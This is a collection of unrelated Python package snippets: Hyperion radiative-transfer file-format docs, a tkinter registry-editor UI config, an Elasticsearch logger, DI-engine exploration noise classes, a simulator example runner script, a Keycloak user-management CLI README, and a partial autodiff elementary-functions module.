* ``n_wav``: the number of wavelengths/frequencies to compute the images and/or
SEDs for.
* If using monochromatic radiative transfer, then the minimum and maximum
frequency of the image and/or SED should be specified with two attributes
``inu_min`` and ``inu_max``, which should be given as integers giving the
indices to the ``frequencies`` array (the first array element should be 1).
* If not using monochromatic radiative transfer, then the minimum and maximum
wavelengths of the image and/or SED should be specified with two attributes
``wav_min`` and ``wav_max``, which should be given as floating point
values, in microns.
* ``d_min`` and ``d_max``: these give the minimum and maxium depth within which
to use photons for the image/SED. Unless you need this and understand the
implications, you should set this to ``-inf`` and ``+inf`` respectively if
``inside_observer`` is ``no``, and ``0`` and ``+inf`` respectively if
``inside_observer`` is ``yes``.
* ``inside_observer``: whether to compute the image from an observer located
inside the grid, or from an observer at infinity. This should be given as a
string that can be either ``yes`` or ``no``. In most cases you will likely
want to use ``no``.
* ``ignore_optical_depth``: whether to ignore optical depth effects when
computing the image/SED. This should be given as a string that can be either
``yes`` or ``no``, and should be set to ``no`` in most cases. This can be
useful for debugging and for understanding how much optical depth effects are
affecting an image or SED.
* If ``inside_observer`` is ``yes``, then the position of the observer should
be given with the ``observer_x``, ``observer_y``, and ``observer_z``
attributes, as floating point values, in cm.
* If ``inside_observer`` is ``no``, then the origin for the peeling-off should
be given with the ``peeloff_x``, ``peeloff_y``, and ``peeloff_z`` attributes,
as floating point values, in cm. In most cases, these should be set to zero.
In addition, the group should contain a table dataset with two columns,
``theta`` and ``phi``, giving the viewing angles as floating point values, in
degrees.
Root-level attributes
=====================
The overall configuration for the model should be specified as attributes for the root group in the HDF5 file. The parameters needed are described in the following sub-sections.
General
-------
* ``python_version``: the version of the Hyperion Python library used to
generate the file. If you are not generating the file with the Hyperion
Python library (which is probably the case if you are reading this page)
then set it to '0.8.7' since that is the version for which the format in
this page is described.
* ``physics_io_bytes``: whether to write out the physical quantities using
4- or 8-byte floating point values. Should be either ``4`` or ``8``
(integer).
Iterations
----------
* ``n_lucy_iter``: Number of temperature-calculating Lucy iterations
(integer)
* ``check_convergence``: Whether to check for convergence in the specific
energy calculation. Should be ``yes`` or ``no`` (string).
* ``convergence_absolute``: the threshold for absolute changes in the
specific energy (float).
* ``convergence_relative``: the threshold for relative changes in the
specific energy (float).
* ``convergence_percentile``: the percentile at which to check the absolute
and relative changes in the specific energy (float).
See :ref:`convergence` for the latter three.
Diffusion approximation
-----------------------
* ``mrw``: Whether or not to use the modified random walk (MRW) algorithm.
Should be ``yes`` or ``no`` (string).
* ``pda``: Whether or not to use the partial diffusion approximation (PDA)
algorithm. Should be ``yes`` or ``no`` (string).
If ``mrw`` is ``yes``, the following two attributes should be set:
* ``mrw_gamma``: The gamma parameter for the modified random walk as
described in :ref:`diffusion` (float).
* ``n_inter_mrw_max``: The maximum number of MRW interactions before a
photon is killed (integer).
Images/SEDs
-----------
* ``raytracing``: Whether to do a raytracing iteration at the end of
the calculation. Should be ``yes`` or ``no`` (string).
* ``monochromatic``: Whether to calculate the images/SEDs in monochromatic
mode. Should be ``yes`` or ``no`` (string).
Number of photons
-----------------
The following attributes are required:
* ``n_stats``: how often to display performance stats. For the MPI-enabled
code, this also determines the chunk of photons to dispatch to each thread
at a time (integer).
If ``n_initial_iter`` is non-zero, then the following photon number should be specified:
* ``n_initial_photons``: number of photons to emit per iteration in the
initial iterations (integer).
If ``raytracing`` is ``yes``, then the following photon numbers should be specified:
* ``n_ray_photons_sources``: number of raytracing photons from sources
(integer). Does not need to be specified if there are no sources.
* ``n_ray_photons_dust``: number of raytracing photons from dust (integer).
Does not need to be specified if there are no dust density grids.
If ``monochromatic`` is ``yes``, then the following photon numbers should be specified:
* ``n_last_photons_sources``: the number of photons (per frequency) to emit
from sources in the imaging iteration (integer). Does not need to be
specified if there are no sources.
* ``n_last_photons_dust``: the number of photons (per frequency) to emit
from dust in the imaging iteration (integer). Does not need to be
specified if there are no dust density grids.
Miscellaneous
-------------
* ``forced_first_interaction``: whether to use the forced first interaction
algorithm. Should be one of ``yes`` or ``no`` (string).
* ``kill_on_absorb``: whether to kill photons when they are absorbed rather
than re-emitting them (useful for scattering-only calculations). Should be
one of ``yes`` or ``no`` (string).
* ``n_inter_max``: the maximum number of interactions a photon can have
before being it is killed (integer).
* ``n_reabs_max``: the maximum number of times a photon can be re-absorbed
before it is killed (integer).
Optional
--------
The following attributes are optional:
* ``sample_sources_evenly``: whether to emit the same number of photons from
each source (as opposed to emitting a number of photons proportional to
the luminosity). Should be ``yes`` or ``no`` (string). Defaults to ``no``.
* ``enforce_energy_range``: whether to always reset values below the minimum
and above the maximum specific energy to the bounds of the range. Should
be ``yes`` or ``no`` (string). Defaults to ``yes``.
| PypiClean |
/AoikRegistryEditor-0.1.0-py3-none-any.whl/aoikregistryeditor/ui_config.py | from __future__ import absolute_import
import os.path
from tkinter import PhotoImage
from tkinter.ttk import Sizegrip
from tkinter.ttk import Style
import aoikregistryeditor.static
#
def configure_ui(info):
"""
UI config function.
@param info: UI config info dict.
@return: None.
"""
# Background color
bg_color = 'white smoke'
# Create ttk style object
STYLE = Style()
# Configure TFrame style's background
STYLE.configure(
'TFrame',
background=bg_color,
)
# Configure TLabelframe style's background
STYLE.configure(
'TLabelframe',
background=bg_color,
)
# Configure TLabelframe.Label style's background
STYLE.configure(
'TLabelframe.Label',
background=bg_color,
)
# Configure TLabel style's background
STYLE.configure(
'TLabel',
background=bg_color,
)
# Configure TRadiobutton style's background
STYLE.configure(
'TRadiobutton',
background=bg_color,
)
# Get TK root window
tk = info['tk']
# Set window title
tk.title('AoikRegistryEditor')
# Set window geometry
tk.geometry('1280x720')
# Configure layout weights for children.
# Row 0 is for registry editor.
tk.rowconfigure(0, weight=1)
# Row 1 is for status bar
tk.rowconfigure(1, weight=0)
# Use only one column
tk.columnconfigure(0, weight=1)
# Get menu tree
menutree = info['menutree']
# Add `File` menu
menutree.add_menu(pid='/', id='File', index=0)
# Add `Exit` command
menutree.add_command(pid='/File', id='Exit', command=tk.quit)
# Get status bar label
status_bar_label = info['status_bar_label']
# Set status bar label's main frame's height
status_bar_label.widget().config(height=20)
# Set status bar label's background
status_bar_label.config(background='#F0F0F0')
# Lay out the status bar label
status_bar_label.grid(
in_=tk,
row=2,
column=0,
sticky='NSEW',
padx=(5, 0),
)
# Create size grip
sizegrip = Sizegrip(master=tk)
# Lay out the size grip
sizegrip.grid(
in_=tk,
row=2,
column=0,
sticky='E',
)
# Get registry editor
editor = info['editor']
# Lay out the registry editor
editor.grid(
row=0,
column=0,
sticky='NSEW',
)
# Set registry editor's inner padding
editor.config(padding=10)
# Get path bar label
path_bar_label = info['path_bar_label']
# Get static files' directory path
static_dir = os.path.dirname(
os.path.abspath(aoikregistryeditor.static.__file__)
)
# Get path bar label's normal state image file path
image_path = os.path.join(static_dir, 'path_bar_label_normal.png')
# Load path bar label's normal state image file
path_bar_label._normal_image = PhotoImage(file=image_path)
# Get path bar label's disabled state image file path
image_path = os.path.join(static_dir, 'path_bar_label_disabled.png')
# Load path bar label's disabled state image file
path_bar_label._disabled_image = PhotoImage(file=image_path)
# Set path bar label's images
path_bar_label.config(
image=(
path_bar_label._normal_image,
'disabled', path_bar_label._disabled_image,
)
)
# Get path bar textfield
path_bar = info['path_bar']
# Set path bar textfield's font
path_bar.config(font=('Consolas', 12))
# Set path bar textfield's outer padding
path_bar.grid(padx=(3, 0))
# Get child keys labelframe
child_keys_labelframe = info['child_keys_labelframe']
# Set child keys labelframe's outer padding
child_keys_labelframe.grid(pady=(5, 0))
# Set child keys labelframe's inner padding
child_keys_labelframe.config(padding=5)
# Get child keys listbox
child_keys_listbox = info['child_keys_listbox']
# Set child keys listbox's font
child_keys_listbox.config(font=('Consolas', 12))
# Get fields labelframe
fields_labelframe = info['fields_labelframe']
# Set fields labelframe's outer padding
fields_labelframe.grid(padx=(10, 0), pady=(5, 0))
# Set fields labelframe's inner padding
fields_labelframe.config(padding=5)
# Get fields listbox
fields_listbox = info['fields_listbox']
# Set fields listbox's font
fields_listbox.config(font=('Consolas', 12))
# Create event handler to set fields listbox background
def _fields_listbox_set_background():
# If fields listbox is not empty
if fields_listbox.size() > 0:
# Set background color for non-empty listbox
fields_listbox.config(background='white')
# If fields listbox is empty
else:
# Set background color for empty listbox
fields_listbox.config(background='gainsboro')
# Call the event handler to initialize the background color
_fields_listbox_set_background()
# Add the event handler to fields listbox
fields_listbox.handler_add(
fields_listbox.ITEMS_CHANGE_DONE,
_fields_listbox_set_background
)
# Get field editor labelframe
field_editor_labelframe = info['field_editor_labelframe']
# Set field editor labelframe's outer padding
field_editor_labelframe.grid(padx=(10, 0), pady=(5, 0))
# Set field editor labelframe's inner padding
field_editor_labelframe.config(padding=5)
# Get field add label
field_add_label = info['field_add_label']
# Set field add label's main frame size
field_add_label.widget().config(width=40, height=40)
# Get field add label's normal state image file path
image_path = os.path.join(static_dir, 'field_add_normal.png')
# Load field add label's normal state image file
field_add_label._normal_image = PhotoImage(file=image_path)
# Get field add label's active state image file path
image_path = os.path.join(static_dir, 'field_add_active.png')
# Load field add label's active state image file
field_add_label._active_image = PhotoImage(file=image_path)
# Get field add label's hover state image file path
image_path = os.path.join(static_dir, 'field_add_hover.png')
# Load field add label' hover state image file
field_add_label._hover_image = PhotoImage(file=image_path)
# Set field add label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_add_label.config(
image=(
field_add_label._normal_image,
'!disabled active', field_add_label._active_image,
'!disabled hover', field_add_label._hover_image,
)
)
# Get field delete label
field_del_label = info['field_del_label']
# Set field delete label's main frame size
field_del_label.widget().config(width=40, height=40)
# Get field delete label's normal state image file path
image_path = os.path.join(static_dir, 'field_del_normal.png')
# Load field delete label's normal state image file
field_del_label._normal_image = PhotoImage(file=image_path)
# Get field delete label's active state image file path
image_path = os.path.join(static_dir, 'field_del_active.png')
# Load field delete label's active state image file
field_del_label._active_image = PhotoImage(file=image_path)
# Get field delete label's hover state image file path
image_path = os.path.join(static_dir, 'field_del_hover.png')
# Load field delete label's hover state image file
field_del_label._hover_image = PhotoImage(file=image_path)
# Set field delete label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_del_label.config(
image=(
field_del_label._normal_image,
'!disabled active', field_del_label._active_image,
'!disabled hover', field_del_label._hover_image,
)
)
# Get field load label
field_load_label = info['field_load_label']
# Set field load label's main frame size
field_load_label.widget().config(width=40, height=40)
# Get field load label's normal state image file path
image_path = os.path.join(static_dir, 'field_load_normal.png')
# Load field load label's normal state image file
field_load_label._normal_image = PhotoImage(file=image_path)
# Get field load label's active state image file path
image_path = os.path.join(static_dir, 'field_load_active.png')
# Load field load label's active state image file
field_load_label._active_image = PhotoImage(file=image_path)
# Get field load label's hover state image file path
image_path = os.path.join(static_dir, 'field_load_hover.png')
# Load field load label's hover state image file
field_load_label._hover_image = PhotoImage(file=image_path)
# Set field load label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_load_label.config(
image=(
field_load_label._normal_image,
'!disabled active', field_load_label._active_image,
'!disabled hover', field_load_label._hover_image,
)
)
# Get field save label
field_save_label = info['field_save_label']
# Set field save label's main frame size
field_save_label.widget().config(width=40, height=40)
# Get field save label's normal state image file path
image_path = os.path.join(static_dir, 'field_save_normal.png')
# Load field save label's normal state image file
field_save_label._normal_image = PhotoImage(file=image_path)
# Get field save label's active state image file path
image_path = os.path.join(static_dir, 'field_save_active.png')
# Load field save label's active state image file
field_save_label._active_image = PhotoImage(file=image_path)
# Get field save label's hover state image file path
image_path = os.path.join(static_dir, 'field_save_hover.png')
# Load field save label's hover state image file
field_save_label._hover_image = PhotoImage(file=image_path)
# Set field save label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_save_label.config(
image=(
field_save_label._normal_image,
'!disabled active', field_save_label._active_image,
'!disabled hover', field_save_label._hover_image,
)
)
# Get field add dialog
field_add_dialog = info['field_add_dialog']
# Set field add dialog's geometry
field_add_dialog.toplevel().geometry('300x110')
# Set field add dialog to not resizable
field_add_dialog.toplevel().resizable(width=False, height=False)
# Set field add dialog's background
field_add_dialog.toplevel().config(background=bg_color)
# Set field add dialog's main frame's outer padding
field_add_dialog.main_frame().grid(padx=5, pady=5)
# Set field add dialog's confirm button's outer padding
field_add_dialog.confirm_button().grid(pady=(15, 0))
# Set field add dialog's cancel button's outer padding
field_add_dialog.cancel_button().grid(pady=(15, 0))
# Set field add dialog's field add type label's outer padding
editor._field_add_type_label.grid(
pady=(10, 0),
)
# Set field add dialog's field add type radio buttons frame's outer padding
editor._field_add_type_rbuttons_frame.grid(
padx=(3, 0),
pady=(10, 0),
) | PypiClean |
/Elastic_logger-1.0.7-py3-none-any.whl/elasticlogger/elastic.py | from datetime import datetime
import jsonpickle
from elasticsearch import Elasticsearch
import threading
import os
from dotenv import load_dotenv
load_dotenv(verbose=False)
class Elastic():
elastic_logger_host = os.getenv("elkHost")
elastic_logger_port = os.getenv("elkPort")
elastic_logger_auth_enable = bool(os.getenv("elkAuthEnable"))
elastic_logger_auth_user = os.getenv("elkAuthUser")
elastic_logger_auth_password = os.getenv("elkAuthPassword")
def __init__(self, _id, _index_name, _index_name_day):
self.index_name = _index_name
self.index_name_day = _index_name_day
self.id = _id
if (not self.elastic_logger_host):
self.elastic_logger_host = ["http://localhost"]
else:
self.elastic_logger_host = str(self.elastic_logger_host).split(",")
if (not self.elastic_logger_port):
self.elastic_logger_port = 9200
if (not self.elastic_logger_auth_enable):
self.elastic_logger_auth_enable = False
if (self.elastic_logger_auth_enable and self.elastic_logger_auth_user and self.elastic_logger_auth_password):
self.es = Elasticsearch(hosts=self.elastic_logger_host, port=self.elastic_logger_port,
auth=(self.elastic_logger_auth_user, self.elastic_logger_auth_password))
else:
self.es = Elasticsearch(hosts=self.elastic_logger_host, port=self.elastic_logger_port)
def post(self, severity, message, args):
try:
body = {"requestId": self.id, "message": message, "@timestamp": datetime.now(),
"application": self.index_name}
if (severity):
body["severity"] = str(severity)
if (args):
body["args"] = args
self.es.index(index=self.index_name_day, doc_type="logs", body=body)
except Exception as e:
print("Elasticsearch unavaliable")
print("An exception occurred [" + jsonpickle.encode(e) + " ]")
pass
def asyncPost(self, severity, message, args):
threading.Thread(target=self.post, args=(severity, message, args)).start() | PypiClean |
/DI_engine-0.4.9-py3-none-any.whl/ding/rl_utils/exploration.py | import math
from abc import ABC, abstractmethod
from typing import Callable, Union, Optional
from copy import deepcopy
from ding.torch_utils.data_helper import to_device
import torch
def get_epsilon_greedy_fn(start: float, end: float, decay: int, type_: str = 'exp') -> Callable:
"""
Overview:
Generate an epsilon_greedy function with decay, which inputs current timestep and outputs current epsilon.
Arguments:
- start (:obj:`float`): Epsilon start value. For 'linear', it should be 1.0.
- end (:obj:`float`): Epsilon end value.
- decay (:obj:`int`): Controls the speed that epsilon decreases from ``start`` to ``end``. \
We recommend epsilon decays according to env step rather than iteration.
- type (:obj:`str`): How epsilon decays, now supports ['linear', 'exp'(exponential)]
Returns:
- eps_fn (:obj:`function`): The epsilon greedy function with decay
"""
assert type_ in ['linear', 'exp'], type_
if type_ == 'exp':
return lambda x: (start - end) * math.exp(-1 * x / decay) + end
elif type_ == 'linear':
def eps_fn(x):
if x >= decay:
return end
else:
return (start - end) * (1 - x / decay) + end
return eps_fn
class BaseNoise(ABC):
r"""
Overview:
Base class for action noise
Interface:
__init__, __call__
Examples:
>>> noise_generator = OUNoise() # init one type of noise
>>> noise = noise_generator(action.shape, action.device) # generate noise
"""
def __init__(self) -> None:
"""
Overview:
Initialization method
"""
super().__init__()
@abstractmethod
def __call__(self, shape: tuple, device: str) -> torch.Tensor:
"""
Overview:
Generate noise according to action tensor's shape, device
Arguments:
- shape (:obj:`tuple`): size of the action tensor, output noise's size should be the same
- device (:obj:`str`): device of the action tensor, output noise's device should be the same as it
Returns:
- noise (:obj:`torch.Tensor`): generated action noise, \
have the same shape and device with the input action tensor
"""
raise NotImplementedError
class GaussianNoise(BaseNoise):
r"""
Overview:
Derived class for generating gaussian noise, which satisfies :math:`X \sim N(\mu, \sigma^2)`
Interface:
__init__, __call__
"""
def __init__(self, mu: float = 0.0, sigma: float = 1.0) -> None:
"""
Overview:
Initialize :math:`\mu` and :math:`\sigma` in Gaussian Distribution
Arguments:
- mu (:obj:`float`): :math:`\mu` , mean value
- sigma (:obj:`float`): :math:`\sigma` , standard deviation, should be positive
"""
super(GaussianNoise, self).__init__()
self._mu = mu
assert sigma >= 0, "GaussianNoise's sigma should be positive."
self._sigma = sigma
def __call__(self, shape: tuple, device: str) -> torch.Tensor:
"""
Overview:
Generate gaussian noise according to action tensor's shape, device
Arguments:
- shape (:obj:`tuple`): size of the action tensor, output noise's size should be the same
- device (:obj:`str`): device of the action tensor, output noise's device should be the same as it
Returns:
- noise (:obj:`torch.Tensor`): generated action noise, \
have the same shape and device with the input action tensor
"""
noise = torch.randn(shape, device=device)
noise = noise * self._sigma + self._mu
return noise
class OUNoise(BaseNoise):
r"""
Overview:
Derived class for generating Ornstein-Uhlenbeck process noise.
Satisfies :math:`dx_t=\theta(\mu-x_t)dt + \sigma dW_t`,
where :math:`W_t` denotes Weiner Process, acting as a random perturbation term.
Interface:
__init__, reset, __call__
"""
def __init__(
self,
mu: float = 0.0,
sigma: float = 0.3,
theta: float = 0.15,
dt: float = 1e-2,
x0: Optional[Union[float, torch.Tensor]] = 0.0,
) -> None:
"""
Overview:
Initialize ``_alpha`` :math:`=\theta * dt\`,
``beta`` :math:`= \sigma * \sqrt{dt}`, in Ornstein-Uhlenbeck process
Arguments:
- mu (:obj:`float`): :math:`\mu` , mean value
- sigma (:obj:`float`): :math:`\sigma` , standard deviation of the perturbation noise
- theta (:obj:`float`): how strongly the noise reacts to perturbations, \
greater value means stronger reaction
- dt (:obj:`float`): derivative of time t
- x0 (:obj:`float` or :obj:`torch.Tensor`): initial action
"""
super().__init__()
self._mu = mu
self._alpha = theta * dt
self._beta = sigma * math.sqrt(dt)
self._x0 = x0
self.reset()
def reset(self) -> None:
"""
Overview:
Reset ``_x`` to the initial state ``_x0``
"""
self._x = deepcopy(self._x0)
def __call__(self, shape: tuple, device: str, mu: Optional[float] = None) -> torch.Tensor:
"""
Overview:
Generate gaussian noise according to action tensor's shape, device
Arguments:
- shape (:obj:`tuple`): size of the action tensor, output noise's size should be the same
- device (:obj:`str`): device of the action tensor, output noise's device should be the same as it
- mu (:obj:`float`): new mean value :math:`\mu`, you can set it to `None` if don't need it
Returns:
- noise (:obj:`torch.Tensor`): generated action noise, \
have the same shape and device with the input action tensor
"""
if self._x is None or \
(isinstance(self._x, torch.Tensor) and self._x.shape != shape):
self._x = torch.zeros(shape)
if mu is None:
mu = self._mu
noise = self._alpha * (mu - self._x) + self._beta * torch.randn(shape)
self._x += noise
noise = to_device(noise, device)
return noise
@property
def x0(self) -> Union[float, torch.Tensor]:
return self._x0
@x0.setter
def x0(self, _x0: Union[float, torch.Tensor]) -> None:
"""
Overview:
Set ``self._x0`` and reset ``self.x`` to ``self._x0`` as well
"""
self._x0 = _x0
self.reset()
noise_mapping = {'gauss': GaussianNoise, 'ou': OUNoise}
def create_noise_generator(noise_type: str, noise_kwargs: dict) -> BaseNoise:
"""
Overview:
Given the key (noise_type), create a new noise generator instance if in noise_mapping's values,
or raise an KeyError. In other words, a derived noise generator must first register,
then call ``create_noise generator`` to get the instance object.
Arguments:
- noise_type (:obj:`str`): the type of noise generator to be created
Returns:
- noise (:obj:`BaseNoise`): the created new noise generator, should be an instance of one of \
noise_mapping's values
"""
if noise_type not in noise_mapping.keys():
raise KeyError("not support noise type: {}".format(noise_type))
else:
return noise_mapping[noise_type](**noise_kwargs) | PypiClean |
/aimm_simulator-2.0.3.tar.gz/aimm_simulator-2.0.3/examples/run_all_examples.sh |
PLOTTER="./src/realtime_plotter.py"
# do-nothing example - no output expected...
python3 examples/AIMM_simulator_example_n0.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n0.py failed with exit code $? - quitting!"
exit 1
fi
# Tutorial example 1...
python3 examples/AIMM_simulator_example_n1.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n1.py failed - quitting!"
exit 1
fi
# Tutorial example 2...
python3 examples/AIMM_simulator_example_n2.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n2.py failed - quitting!"
exit 1
fi
# Tutorial example 3...
python3 examples/AIMM_simulator_example_n3.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n3.py failed - quitting!"
exit 1
fi
# Tutorial example 3a...
python3 examples/AIMM_simulator_example_n3a.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n3a.py failed - quitting!"
exit 1
fi
# Tutorial example 4...
python3 examples/AIMM_simulator_example_n4.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n4.py failed - quitting!"
exit 1
fi
# Tutorial example 5...
(time python3 examples/AIMM_simulator_example_n5.py | "${PLOTTER}" -nplots=3 -tmax=500 -ylims='{0: (-100,100), 1: (-100,100), 2: (0,30)}' -ylabels='{0: "UE[0] $x$", 1: "UE[0] $y$", 2: "UE[0] throughput"}' -fnb='examples/img/AIMM_simulator_example_n5' -author='Keith Briggs')
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n5.py failed - quitting!"
exit 1
fi
# Tutorial example 6...
(time python3 examples/AIMM_simulator_example_n6.py | "${PLOTTER}" -nplots=1 -tmax=100 -ylims='[(0,1),]' -ylabels='{0: "average downlink throughput over all UEs"}' -fnb='examples/img/AIMM_simulator_example_n6' -author='Keith Briggs')
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n6.py failed - quitting!"
exit 1
fi
# Tutorial example 7...
(python3 examples/AIMM_simulator_example_n7.py | "${PLOTTER}" -nplots=4 -tmax=2000 -ylims='{0: (0,10), 1: (0,1000), 2: (0,1000), 3: (0,30)}' -ylabels='{0: "UE[0] throughput", 1: "UE[0] $x$", 2: "UE[0] $y$", 3: "UE[0] serving cell"}' -fnb='examples/img/AIMM_simulator_example_n7' -author='Keith Briggs')
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n7.py failed - quitting!"
exit 1
fi
# Tutorial example 8...
python3 examples/AIMM_simulator_example_n8.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n8.py failed - quitting!"
exit 1
fi
#bash run_RIC_example.sh | PypiClean |
/FOMUserUtil-0.0.13.tar.gz/FOMUserUtil-0.0.13/README.md | <!-- PROJECT SHIELDS -->
[](/../../graphs/contributors)
[](/../../network/members)
[](/../../stargazers)
[](/../../issues)
[](/LICENSE.md)
[](https://github.com/bcgov/repomountie/blob/master/doc/lifecycle-badges.md)
# Overview
<img src="https://lh3.googleusercontent.com/pw/AM-JKLVQ3zIZBxbAlzoCsqFki5ndraAKWN0V39ChQO_Z70ILBbwtNZAwJkWUlGp4Rg0I7rUhB4Qi5qfM507gC6yafbQV-L9ni8LMBojAVi_EuF7mnaBz5SyWf0RMIUx7WVcSsGj6EsTBQ90zhxvaYqSTmVuA4Q=w1072-h804-no?authuser=0" width='600px'>
The [Forest Operations Map](https://github.com/bcgov/nr-fom-api) application
supports the ability for licensees to authenticate / login to the application.
Authentication is handled using OIDC. The application in its current site
requires that someone in government be able to manage access.
Adding new users / roles to the application through the keycloak UI would be
inefficient as it would require looking up:
* forest client number
* determining if it exists as a role in keycloak
* create if roles does not exist
* add user to the role
This repository contains the code for a simple command line based tool. That
will make it easy to add new users to the FOM application.
# Setup
## Run setup script
### Download the install script from [here](https://raw.githubusercontent.com/bcgov/nr-fom-usermanager/main/fom_shell.sh)
```
# download the file:
curl https://raw.githubusercontent.com/bcgov/nr-fom-usermanager/main/util/mgr_shell.sh -o mgr_shell.sh
# edit line 5 adding the keycloak secret
# make the file executable
chmod +x mgr_shell.sh
# install deps
util/mgr_shell.sh
# run fomuser
fomuser
```
## Return and re-run
```
# set up the virtualenv
util/mgr_shell.sh
# run fomuser
fomuser
```
# Older Instructions - hopefully replaced by above
## define the following env vars
Either copy this file as .env: [https://raw.githubusercontent.com/bcgov/nr-fom-usermanager/main/env-sample]
or populate these env vars
```
KC_HOST=https://<host>
KC_CLIENTID=<The kc client set up to administer fom users>
KC_SECRET=<client secret>
KC_REALM=<realm>
KC_FOM_CLIENTID=<the kc client that fom app uses to authenticate against>
```
## Install
```
python3 -m venv venvfom
source ./venvfom/bin/activate
pip install FOMUserUtil
```
## Re-use Venv after install
```
source ./venvfom/bin/activate
fomuser
```
# Using the CLI tool
## Search forest clients
Before a new user can be added we need to know what forest client id to attach
them to. This is accomplished with a forest client search.
`fomuser -qfc <search string>`
Example:
```
kirk@NCC1701:$ fomuser -qfc kli
forest clients matching: kli
--------------------------------------------------------------------------------
KLINGON CONTRACTING LTD. - 18514
KLINGON SAND & GRAVEL LTD. - 31775
KLINGON & BORG CONSULTING - 53996
KLI FOREST PRODUCTS INC. - 68697
KLI ENG. & LAND SURVEYING INC - 97448
KLI INVESTMENTS LTD. - 103766
KLIMA RESOURCES LTD. - 110974
KLISTERS PELLET INC - 126239
KLIK & CLOCK CONSULTING LTD. - 126967
```
## Search Keycloak users
Having determined what the forest client id is, use the following command to
search for the users in keycloak:
`fomuser -qu <search string>`
Example:
```
kirk@NCC1701:$ fomuser -qu sp
matching users for search: kj
--------------------------------------------------------------------------------
spock@enterprisedir - [email protected]
speed.warp@Prometheusdir - [email protected]
sp.warf@bce-klingon-id - [email protected]
```
## Adding the user - <not complete>
Having determined the user id, and the forest client the new user can now be
added:
`fomuser --add <userid> <forest client id>`
Projected syntax:
```
fom-user <forest client id> <user email>
```
# Building the package manually
```
pip install -r requirements-build.txt
python -m build --sdist
```
# Related links / Information
https://github.com/bcgov/ocp-sso/issues/118
# Keycloak Config
Assuming a fom client config already exists, the following instructions
outline what needs to be done to add fom admin service account / client
to keycloak. At the moment this is accomplished using the GUI.
* Create client
* protocol = openid-connect
* root url = blank
* Configure Client - (screen that comes up after client is created)
* fill in <name> and <description>
* Access Type: confidential
* Service Accounts Enabled: On
* valid redirect uris: localhost
* Configure roles: <Service Account Roles>
* type 'realm-management' in Client Roles and select
* Assign the following roles:
* manage-clients
* manage-users
* query-clients
* view-clients
* view-users
# Development
* before pushing new versions, be sure to increment the version in the files:
* src/FOMUserUtil/__init__.py
* setup.cfg | PypiClean |
/AutoDiffpyy-1.0.tar.gz/AutoDiffpyy-1.0/AutoDiffpy/ElementaryFunc.py |
import numpy as np
from dual import Dual
from Node import Node
# Trig functions
def sin(x):
"""
Return the sine value of x.
Parameters
----------
x : int, float, Dual, Node
Input to the sine function.
Returns
-------
value : int, float, Dual
The sine value of the dual number implementation or the sine value of a real number.
"""
if isinstance(x, Node):
child = Node(np.sin(x.value))
x.children.append({'partial_der':np.cos(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.sin(x.real), np.cos(x.real) * x.dual)
else:
return np.sin(x)
def cos(x):
"""
Return the cosine value of x.
Parameters
----------
x : int, float, Dual
Input to the cosine function.
Returns
-------
value : int, float, Dual
The cosine value of the dual number implementation or the cosine value of a real number.
"""
if isinstance(x, Node):
child = Node(np.cos(x.value))
x.children.append({'partial_der':-np.sin(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.cos(x.real), -np.sin(x.real) * x.dual)
else:
return np.cos(x)
def tan(x):
"""
Return the tangent value of x.
Parameters
----------
x : int, float, Dual
Input to the tangent function.
Returns
-------
value : int, float, Dual
The tangent value of the dual number implementation or the tangent value of a real number.
"""
if isinstance(x, Node):
child = Node(np.tan(x.value))
x.children.append({'partial_der':1/(np.cos(x.value)**2), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.tan(x.real), 1/np.cos(x.real)**2*np.asarray(x.dual))
else:
return np.tan(x)
# Inverse trig functions
def arcsin(x):
"""
Return the arcsine value of x.
Parameters
----------
x : int, float, Dual
Input to the arcsine function.
Returns
-------
value : int, float, Dual
The arcsine value of the dual number implementation or the arcsine value of a real number.
"""
if isinstance(x,Node):
child = Node(np.arcsin(x.value))
temp = 1 - x.value**2
if temp <= 0:
raise ValueError('The domain of sqrt should be larger than 0')
x.children.append({'partial_der':1/(np.sqrt(temp)), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.arcsin(x.real), x.dual / np.sqrt(1 - x.real**2))
else:
return np.arcsin(x)
def arccos(x):
"""
Return the arccosine value of x.
Parameters
----------
x : int, float, Dual
Input to the arccosine function.
Returns
-------
value : int, float, Dual
The arccosine value of the dual number implementation or the arccosine value of a real number.
"""
if isinstance(x,Node):
child = Node(np.arccos(x.value))
temp = 1 - x.value**2
if temp <= 0:
raise ValueError('The domain of sqrt should be larger than 0')
x.children.append({'partial_der':-1/(np.sqrt(temp)), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.arccos(x.real), -x.dual / np.sqrt(1 - x.real**2))
else:
return np.arccos(x)
def arctan(x):
"""
Return the arctangent value of x.
Parameters
----------
x : int, float, Dual
Input to the arctangent function.
Returns
-------
value : int, float, Dual
The arctangent value of the dual number implementation or the arctangent value of a real number.
"""
if isinstance(x,Node):
child = Node(np.arctan(x.value))
x.children.append({'partial_der':1/(1+x.value**2), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.arctan(x.real), x.dual / (1 + x.real**2))
else:
return np.arctan(x)
# Exponentials
def exp(x):
"""
Return the exponential value of x with base e.
Parameters
----------
x : int, float, Dual
Input to the exponential function with base e.
Returns
-------
value : int, float, Dual
The exponential value of the dual number implementation or the exponential value of a real number with base e.
"""
if isinstance(x,Node):
child = Node(np.exp(x.value))
x.children.append({'partial_der':np.exp(x.value), 'node':child})
return child
elif isinstance(x, Dual):
